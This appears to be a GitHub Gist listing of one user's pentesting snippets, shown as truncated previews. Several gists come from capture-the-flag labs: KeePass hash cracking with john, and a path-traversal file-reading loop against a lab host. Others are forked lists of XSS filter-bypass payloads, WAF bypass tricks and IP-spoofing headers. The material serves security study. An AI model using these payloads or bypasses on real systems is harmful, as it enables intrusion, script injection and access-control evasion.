sharpicx
sharpicx
/ scripts.sh
Last active
February 21, 2023 09:45
small script of doing pentest on hackmyvm.eu
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/env bash | |
| # script made by sharpicx while playing driftingblues5 @ hackmyvm.eu | |
| # screenshot: https://i.postimg.cc/Gp2n93HX/image.png | |
| # keys=("2real4surreal" "buddyretard" "closet313" "exalted" "fracturedocean" "zakkwylde") | |
| # keys cracked by keepass2john | |
| # ╭─ via [machines/driftingblues5] | |
| # ╰─ john --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt hash | |
| # Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl" | |
| # Use the "--format=KeePass-opencl" option to force loading these as that type instead |
sharpicx
/ hmvunzip.sh
Last active
February 26, 2023 04:47
unzipping hackmyvm files in my fkin folders.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/env bash | |
| # just a small script to unzip the ova hmv machines inside (.zip) extension and delete the zip files automatically to make it clean. | |
| # sharpicx | |
| # https://asciinema.org/a/562925 | |
| case "$1" in | |
| check) | |
| if [[ "$(/bin/ls /home/via/Downloads/vms/hmv/* | grep -w 'zip$')" ]]; then | |
| read -p "the zip files are there!, wanna unzip it [yes/nope]? " chosen_shit | |
| case "$chosen_shit" in |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // backup from the last repository | |
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Security.Cryptography; | |
| using System.Text; | |
| namespace cascadecrypt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "use scrict"; | |
| (function () { | |
| var timeouts = []; | |
| window.mobileAndTabletCheck = function () | |
| { | |
| var check = false; | |
| (function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\- |
sharpicx
/ translate-cli
Created
March 18, 2023 07:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/env bash | |
| # made by sharpicx with love | |
| green="\033[1:36m" | |
| reset="\033[1:0m" | |
| function main() { | |
| while true; do | |
| echo 'dibuat oleh sharpicx' | |
| read -p "pilih [indo/english/clear]> " indo_english | |
| case "$indo_english" in |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| # script made by sharpicx | |
| function optional() { | |
| while true; do | |
| read -p '~> ' input_params | |
| hasil=$(curl -s "http://bagel.htb:8000/?page=../../../..$input_params" | tr '\0' '\n') | |
| if [[ "$(echo $hasil | grep 'File not found')" ]]; then | |
| echo -e "try again\n" |
sharpicx
/ xxsfilterbypass.lst
Created
April 12, 2023 21:39
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
sharpicx
/ xss-bypass-waf
Created
April 12, 2023 21:39
— forked from zetc0de/xss-bypass-waf
XSS Bypass WAF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @vanshitmalhotra | Bypass AWS WAF -// | |
| Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
| eg: <!<script>confirm(1)</script> | |
| @black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
| <img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
| DotDefender WAF bypass by @0xInfection | |
| <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |
sharpicx
/ bypass waf by http headers
Created
April 12, 2023 21:39
— forked from wh1t3p1g/bypass waf by http headers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - X-forwarded-for | |
| - X-remote-IP | |
| - X-originating-IP | |
| - x-remote-addr | |
| waf通常会有一个不拦截任意请求的白名单ip,上面的几个头可以用来伪造ip | |
| 如: | |
| X-Forwarded-For: 127.0.0.1 | |
| X-Remote-Ip: 127.0.0.1 | |
| X-Originating-Ip: 127.0.0.1 | |
| X-Remote-Addr: 127.0.0.1 |
sharpicx
/ gist:5fbad682a91f008b2d4f007ff73eb0fe
Created
April 13, 2023 06:39
— forked from kaimi-/gist:6b3c99538dce9e3d29ad647b325007c1
Possible IP Bypass HTTP Headers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CACHE_INFO: 127.0.0.1 | |
| CF_CONNECTING_IP: 127.0.0.1 | |
| CF-Connecting-IP: 127.0.0.1 | |
| CLIENT_IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| COMING_FROM: 127.0.0.1 | |
| CONNECT_VIA_IP: 127.0.0.1 | |
| FORWARD_FOR: 127.0.0.1 | |
| FORWARD-FOR: 127.0.0.1 | |
| FORWARDED_FOR_IP: 127.0.0.1 |